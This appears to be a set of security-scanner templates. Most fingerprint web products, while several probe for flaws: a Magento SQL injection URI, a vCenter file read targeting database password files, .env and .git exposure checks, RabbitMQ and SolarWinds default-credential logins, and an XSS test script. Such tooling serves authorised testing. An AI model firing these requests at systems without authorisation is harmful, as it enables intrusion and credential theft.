VULN_NAME='Drupal Detected 3' 3 | URI='/drupal/' 4 | METHOD='GET' 5 | MATCH="drupal\.org" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Drupal_Scanner_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Detected 2' 3 | URI='/blog/' 4 | METHOD='GET' 5 | MATCH="drupal\.org" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Drupal_User_Login.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal User Login' 3 | URI='/user/login?destination=/' 4 | METHOD='GET' 5 | MATCH='user-login-form' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Drupal_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Version Disclosure' 3 | URI='/core/install.php?profile=default' 4 | METHOD='GET' 5 | MATCH='site-version' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/F5_BIG-IP_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='F5 BIG-IP Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='F5 BIG-IP' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/F5_BIG-IP_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='F5 BIG-IP Detected 2' 3 | URI='/tmui/login.jsp' 4 | METHOD='GET' 5 | MATCH='F5 BIG-IP' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Fortigate_Pulse_Connect_Secure_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortigate Pulse Connect Secure Detected' 3 | URI='/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH='<title>Please Login' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected' 3 | URI='/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 1' 3 | URI='/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 2' 3 | URI=':10443/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 3' 3 | URI=':4443/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Frontpage_Service_Password_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Frontpage Service Password Disclosure' 3 | URI='/_vti_pvt/service.pwd' 4 | METHOD='GET' 5 | MATCH=' Frontpage' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Git_Config_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Git Config Detected 1' 3 | URI='/.git/config' 4 | METHOD='GET' 5 | MATCH="\[core\]" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/JK_Status_Manager.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='JK Status Manager' 3 | URI='/jkstatus/' 4 | METHOD='GET' 5 | MATCH="JK\ Status\ Manager" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jaspersoft_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jaspersoft Detected' 3 | URI='/jasperserver/login.html?error=1' 4 | METHOD='GET' 5 | MATCH="Jaspersoft" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jenkins_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jenkins Detected' 3 | URI='/login?from=%2F' 4 | METHOD='GET' 5 | MATCH="\[Jenkins\]" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jetty_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jetty Version Disclosure Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='Powered by Jetty' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jira_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jira Detected 1' 3 | URI='/secure/Dashboard.jspa' 4 | METHOD='GET' 5 | MATCH='Project Management Software' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jira_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jira Detected 2' 3 | URI='/jira/secure/Dashboard.jspa' 4 | METHOD='GET' 5 | MATCH='Project Management Software' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jira_Scanner_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jira Detected' 3 | URI='/secure/ContactAdministrators!default.jspa' 4 | METHOD='GET' 5 | MATCH='Project Management Software' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jolokia_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jolokia Version Disclosure' 3 | URI='/jolokia/version' 4 | METHOD='GET' 5 | MATCH="\"agent\"\:" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Joomla_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Joomla Detected 1' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='content="Joomla! ' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Joomla_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Joomla Detected 1' 3 | URI='/joomla/' 4 | METHOD='GET' 5 | MATCH='content="Joomla! ' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Joomla_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Joomla Version Disclosure' 3 | URI='/administrator/manifests/files/joomla.xml' 4 | METHOD='GET' 5 | MATCH="Joomla\ version\ " 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Laraval_Environment_File_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Laraval Environment File Found' 3 | URI='/.env' 4 | METHOD='GET' 5 | MATCH="DB_PASSWORD|REDIS_PASSWORD|MAIL_PASSWORD|AWS_SECRET|PUSHER_APP_|MIX_PUSHER_APP_" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/MS_SQL_Reporting_Server_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MS SQL Reporting Server Detected 1' 3 | URI='/ReportServer/pages/ReportViewer.aspx' 4 | METHOD='GET' 5 | MATCH='Microsoft\.Reporting' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/MS_SQL_Reporting_Server_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MS SQL Reporting Server Detected 2' 3 | URI='/Reports/Pages/Folder.aspx' 4 | METHOD='GET' 5 | MATCH='Microsoft\.Reporting' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Magento_2.3.0_SQL_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Magento 2.3.0 SQL Injection' 3 | URI="/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20-" 4 | METHOD='GET' 5 | MATCH="\[\]" 6 | SEVERITY='P1 - Critical' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Mailman_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Mailman Version Disclosure' 3 | URI='/mailman/listinfo' 4 | METHOD='GET' 5 | MATCH="Delivered\ by\ Mailman" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' 10 | -------------------------------------------------------------------------------- /templates/active/MobileIron_Login_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MobileIron Login 1' 3 | URI='/mifs/user/login.jsp' 4 | METHOD='GET' 5 | MATCH="MobileIron" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/MobileIron_Login_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MobileIron Login 2' 3 | URI='/mifs/login.jsp' 4 | METHOD='GET' 5 | MATCH="MobileIron" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/MobileIron_Login_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MobileIron Login 3' 3 | URI='/mifs/c/d/android.html' 4 | METHOD='GET' 5 | MATCH="MobileIron" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/PHP_Composer_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='PHP Composer Disclosure' 3 | URI='/composer.json' 4 | METHOD='GET' 5 | MATCH='repositories|require-dev' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/PHP_Info.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='PHP Info Detected 1' 3 | URI='/phpinfo.php' 4 | METHOD='GET' 5 | MATCH='>PHP Version \<' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-e' -------------------------------------------------------------------------------- /templates/active/Palo_Alto_GlobalProtect_PAN-OS_Portal_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Palo Alto GlobalProtect PAN-OS Portal Detected' 3 | URI='/global-protect/login.esp' 4 | METHOD='GET' 5 | MATCH="<title>GlobalProtect" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/PulseSecure_VPN_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='PulseSecure VPN Detected' 3 | URI='/dana-na/auth/url_admin/welcome.cgi' 4 | METHOD='GET' 5 | MATCH='<title>SSL' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/RabbitMQ_Management_Default_Credentials.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='RabbitMQ Management Default Credentials' 3 | URI="/api/whoami" 4 | METHOD='GET' 5 | MATCH="{\"name\":\"guest\"" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS='-H "Content-Type: application/json" -H "Authorization: Z3Vlc3Q6Z3Vlc3Q=" --user-agent '' -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/RabbitMQ_Management_Interface_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='RabbitMQ Management Interface Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="<title>RabbitMQ Management" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Robots.txt_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Robots.txt Detected' 3 | URI='/robots.txt' 4 | METHOD='GET' 5 | MATCH='Disallow\:|Allow\:|Sitemap\:' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/SAP_NetWeaver_AS_JAVA_LM_Configuration_Wizard_Detection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-6287 - SAP NetWeaver AS JAVA LM Configuration Wizard Detection' 3 | URI='/CTCWebService/CTCWebServiceBean/ConfigServlet' 4 | METHOD='GET' 5 | MATCH="CTCWebServiceSi" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: text/xml; charset=UTF-8' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/SQLiteManager_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SQLiteManager Detected' 3 | URI='/sqlite/' 4 | METHOD='GET' 5 | MATCH='<title>SQLiteManager' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Sitemap.xml_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Sitemap.xml Detected' 3 | URI='/sitemap.xml' 4 | METHOD='GET' 5 | MATCH='<?xml\ ' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/SolarWinds_Orion_Default_Credentials_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SolarWinds Orion Default Credentials 1' 3 | URI='/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS' 4 | METHOD='GET' 5 | MATCH="totalRow" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' -------------------------------------------------------------------------------- /templates/active/SolarWinds_Orion_Default_Credentials_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SolarWinds Orion Default Credentials 2' 3 | URI=':17778/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROW' 4 | METHOD='GET' 5 | MATCH="totalRow" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' -------------------------------------------------------------------------------- /templates/active/SolarWinds_Orion_Panel.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SolarWinds Orion Panel' 3 | URI='/Orion/Login.aspx' 4 | METHOD='GET' 5 | MATCH="SolarWinds\ Orion" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/TeamQuest_Login_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='TeamQuest Login Found' 3 | URI='/teamquest/cgi-bin/login' 4 | METHOD='GET' 5 | MATCH="TeamQuest\ \-\ Login" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Telerik_File_Upload_Web_UI.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Telerik File Upload Web UI' 3 | URI='/Telerik.Web.UI.WebResource.axd?type=rau' 4 | METHOD='GET' 5 | MATCH="RadAsyncUpload\ handler\ is\ registered\ succesfully" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Tiki_Wiki_CMS_Groupware_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Tiki Wiki CMS Groupware' 3 | URI='/tiki-login.php' 4 | METHOD='GET' 5 | MATCH="Groupware" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Unauthenticated_Jenkins_Dashboard_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Unauthenticated Jenkins Dashboard Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="\[Jenkins\]" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/VMware_vCenter_Unauthenticated_Arbitrary_File_Read.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='VMware vCenter Unauthenticated Arbitrary File Read' 3 | URI='/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties' 4 | METHOD='GET' 5 | MATCH="dbtype\ |password\.ecrypted" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Weak_Authentication_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Weak Authentication' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='realm\=' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="-I -L --user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' 10 | 11 | if [[ "$SSL" == "false" ]]; then 12 | SEVERITY='P2 - HIGH' 13 | fi -------------------------------------------------------------------------------- /templates/active/WebLogic_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='WebLogic Detected' 3 | URI='/console/login/LoginForm.jsp' 4 | METHOD='GET' 5 | MATCH='WebLogic' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Web_Config_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Web Config Detected 1' 3 | URI='/web.config' 4 | METHOD='GET' 5 | MATCH='<configuration>' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="-L --user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Weblogic_Application_Server_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Weblogic Application Server Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="Weblogic\ Application\ Server" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Wordpres_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Detected 1' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="content\=\"WordPress" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Wordpres_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Detected 2' 3 | URI='/blog/' 4 | METHOD='GET' 5 | MATCH="content\=\"WordPress" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Wordpres_Scanner_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Detected 3' 3 | URI='/wordpress/' 4 | METHOD='GET' 5 | MATCH="content\=\"WordPress" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Wordpress_WP-File-Manager_Version_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress WP-File-Manager Version Detected' 3 | URI="/wp-content/plugins/wp-file-manager/readme.txt" 4 | METHOD='GET' 5 | MATCH="Stable\ tag\:" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/XSS.py: -------------------------------------------------------------------------------- 1 | # Import any WebDriver class that you would usually import from 2 | # selenium.webdriver from the seleniumrequests module 3 | import sys 4 | from seleniumrequests import Firefox 5 | 6 | url = sys.argv[1] 7 | # Simple usage with built-in WebDrivers: 8 | webdriver = Firefox() 9 | response = webdriver.request('GET', '%s/xss.php?xss=<script>document.write(INJECTX)</script>' % url) 10 | if '<script>document.write(INJECTX)</script>' in response.text: 11 | print("Vulnerable!") 12 | print(response.text) 13 | webdriver.quit() 14 | SECONDARY_COMMANDS='' 15 | -------------------------------------------------------------------------------- /templates/active/cPanel_Login_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='cPanel Login Found' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="cPanel\ Login" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' 10 | -------------------------------------------------------------------------------- /templates/active/cPanel_Login_Found_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='cPanel Login Found 2' 3 | URI=':2083/' 4 | METHOD='GET' 5 | MATCH="cPanel\ Login" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' 10 | -------------------------------------------------------------------------------- /templates/active/phpMyAdmin_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='phpMyAdmin Detected' 3 | URI='/phpmyadmin/' 4 | METHOD='GET' 5 | MATCH='<title>phpMyAdmin ' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 